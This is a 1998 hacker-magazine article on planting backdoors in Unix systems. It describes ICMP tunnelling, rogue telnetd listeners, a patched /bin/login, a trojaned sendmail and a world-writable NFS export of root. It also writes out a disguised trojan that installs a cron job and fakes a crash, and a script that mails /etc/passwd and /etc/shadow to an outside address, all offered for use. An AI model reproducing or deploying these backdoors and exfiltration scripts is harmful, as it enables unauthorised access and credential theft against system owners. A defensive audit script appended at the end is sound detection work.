- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[ a r t i c l e ] [ a u t h o r ]

Backdoors in U**x Systems
ManiaX Killerian
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

1. What is a backdoor and can it grow here :)

The so-called backdoors are programs which give you unauthorised and
not-too-easily-detectable access to a system. They come in several
varieties: resident, working from time to time, and offline. They can also
be divided into several groups according to the protocol they use:
typically TCP/IP, less often UDP/IP and pure IP, and a small portion uses
SMTP and ICMP/IP.

(Rem. from the Editor: they can grow anywhere you plant them...)

2. Resident (on-demand) backdoors

These are the most commonly used backdoors for the simple reason of being
the fastest (no waiting required, and you have an on-line session).
According to the protocol used we have the following types of backdoors:

2.1. Backdoors using ICMP, for example loki

It is my personal favourite, that's why I'll start with it. Its shortest
definition is 'Telnet through pings'. loki uses ICMP echo request and ICMP
echo reply packets to carry the traffic of the telnet session. Its advantage
is that it is hard to detect (it can be detected with lots of tcpdump-ing as
well as ps auxw, but an excellent knowledge of the normal processes is a
must). It works on Solaris, Linux and BSD, though there are some problems
with its compilation (a tutorial can be found in Phrack 49 and the source in
Phrack 51, available at www.phrack.com, ftp.phrack.com or
ftp.fc.net/pub/phrack). Its disadvantages are not many: it requires its own
client, it doesn't support any authentication (no login or password), and it
cannot be used under Windows (NAAAAAAAA! :) ); on the other hand the source
is available for correcting all these shortcomings (well, apart from the
first one). It supports several connection encryption methods such as
Blowfish, RSA or simply XOR :).
During my experiments it performed very well, the only problem being that at
least once it failed to get the end of the output of a command (netstat)
right. It is also not suitable for interactive programs like vi, joe,
tcpdump, etc. (this can be fixed with some prying in the source as well...).

2.2. Backdoors using TCP/IP

This is the most common type, probably because it is the simplest: it runs
everywhere and it can be used with a plain telnet client (in most cases), so
you, miserable winboze users, are quite lucky here :))). The simplest way is
to put another in.telnetd on port 666 or something else of that kind; it
will let you log in at any time to port 666, even though the traffic on the
normal port 23 might be blocked (you can also run sshd, i.e. the Secure
Shell daemon, on some strange port). Another common case is the 'magic'
password, which accepts any user no matter what login he may have typed in
(it is achieved by modifying /bin/login). You can do an even cleverer trick,
for example replacing sendmail with an older version that supports the 'wiz'
command (which drops you into a root shell... :) ), while changing only the
version number..... Generally, such attempts can be detected with
'netstat -a | grep LISTEN', but they are still worth a try (p.s. this is THE
BEST way to do a portscan: log in and run netstat -a | grep LISTEN). There
are even smarter things, for example ACK-only telnet, which is used behind
firewalls: if the firewall stops all incoming TCP connections to inside
hosts (i.e. the packets that negotiate the connection have their SYN flag
set), the client instead sends a packet without SYN, with the ACK flag only,
after which the daemon on the other side completes the connection and
voila...

(Rem. from the Editor: if you have no idea about SYN or ACK, you should find
the RFC with the description of the IP header.)
(Paranoia seems to be after me as well: as I write these things, I
frequently check if they are present on my server :) )

2.3. Backdoors using UDP/IP

The only backdoor that I can think of here is NFS, the Network File System,
which allows you to mount other people's disks and, with some luck (i.e. if
they are exported read-write), to write whatever you like on them. Here is
one of the best backdoors of this type: you add to /etc/exports the
following line:

    / (rw)

which in our language means that the root directory is now open to anyone
willing to play tricks on it (you might be tempted to run rm -rf, but you'd
better forget about doing it over NFS; it's terribly slow...).

3. Not so ever-present backdoors - offline or working at certain moments

3.1. Offline backdoors

In general, these are various clever tricks such as a changed passwd
command, which stores passwords somewhere in plain text and sends them each
night at 12:10; or an addition to crontab that mails /etc/shadow and
/etc/passwd daily. Alternatively it can copy them to /pub with 666 (no, not
The Number Of the Beast, but rw-rw-rw-) permissions, and all sorts of such
nasty tricks... Or a given address with procmail, to which we send a mail
with some command and it then returns a mail with the command's result (it
can be disguised as a mail from a false address, and the answer can contain
an error, etc.). So here we have lots of options, and this particular type
can be installed very easily by mailing something, for example a "super
program", which in fact reads:

    #!/bin/sh
    # save the current crontab, append a midnight job, reload it
    crontab -l >/tmp/NonUsableName
    echo "0 0 * * * $HOME/.hack" >>/tmp/NonUsableName
    crontab /tmp/NonUsableName
    # drop the payload as a hidden file, then fake a crash
    cp evil .hack
    sleep 2
    echo Segmentation fault

That's it, as simple as BASIC :) and here's an example for evil:

    #!/bin/sh
    cat /etc/passwd /etc/shadow | mail some_bad_guy@hotmail.com

Enjoy life......

3.2.
Working at certain moments

This trick is intended for use behind very good firewalls that log and trace
each TCP connection (there are really FEW of this kind). It is a program
which connects to you at certain intervals; you send commands and it runs
them, like a backward telnet. Just like loki, it requires its own client, so
it's not very convenient, but if you have no other option.....

That's all from me :)))) It almost SUX, but if you can write it better, just
do it.

(Rem. from the Editor: it really SUX, but if you have any experience with the
stuff, i.e. you are not a true lamer, you will grasp it straight away. ManiaX
has just written it as a concise plan-summary...)

ManiaX Killerian

Copyright (C) 1998 Phreedom Magazine
www.phreedom.org | phreedom.orbitel.bg
staff@phreedom.org :: mboard.phreedom.org
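As an added defender's example (not part of the original article), the following POSIX shell audit script checks a host for the three traces the article describes: a writable export of / in /etc/exports (section 2.3), crontab entries that run hidden dotfile scripts or touch the password files (3.1), and listening sockets absent from a saved baseline, the 'netstat -a | grep LISTEN' check of 2.2. The function names, file paths and sample data are assumptions constructed for the example.

```shell
#!/bin/sh
# Added audit example, not code from the original article. Each check takes
# file paths as arguments so it can run on live files or on saved listings;
# the sample data at the bottom is constructed, not taken from a real host.

# 2.3: an /etc/exports line that exports / with write access, e.g. "/ (rw)".
check_exports() {                      # $1 = exports file; prints offending lines
    [ -r "$1" ] || return 0
    grep -E '^/[[:space:]].*\(([^)]*,)?rw(,|\))' "$1" || true
}

# 3.1: crontab entries that run a hidden dotfile script (the article's
# $HOME/.hack), read the password files, or pipe into mail. Comments are skipped.
check_crontab() {                      # $1 = saved "crontab -l" output
    grep -v '^#' "$1" | grep -E '/\.[A-Za-z]|/etc/(shadow|passwd)|[|][[:space:]]*mail' || true
}

# 2.2: listening sockets present now but absent from a baseline taken when the
# host was known clean (a second telnetd on port 666 shows up here).
check_listeners() {                    # $1 = baseline "netstat -an", $2 = current
    b=$(mktemp) ; c=$(mktemp)
    awk '/LISTEN/ { print $4 }' "$1" | sort -u >"$b"   # $4 = local address:port
    awk '/LISTEN/ { print $4 }' "$2" | sort -u >"$c"
    comm -13 "$b" "$c"                 # lines only in the current listing
    rm -f "$b" "$c"
}

# Constructed sample data so the script runs offline; replace with
# /etc/exports, "crontab -l -u <user>" output and real netstat listings.
d=$(mktemp -d)
printf '/home 10.0.0.0/24(ro)\n/ (rw)\n' >"$d/exports"
printf '# m h dom mon dow command\n30 3 * * * /usr/bin/updatedb\n0 0 * * * /home/bob/.hack\n' >"$d/crontab"
printf 'tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN\ntcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN\n' >"$d/base"
{ cat "$d/base"; printf 'tcp 0 0 0.0.0.0:666 0.0.0.0:* LISTEN\n'; } >"$d/cur"

echo "== writable root exports ==";     check_exports   "$d/exports"
echo "== suspicious cron entries ==";   check_crontab   "$d/crontab"
echo "== listeners not in baseline =="; check_listeners "$d/base" "$d/cur"
rm -rf "$d"
```

Run it from cron itself with a baseline saved right after installation, and any new listener, root export or hidden cron job is reported the next morning.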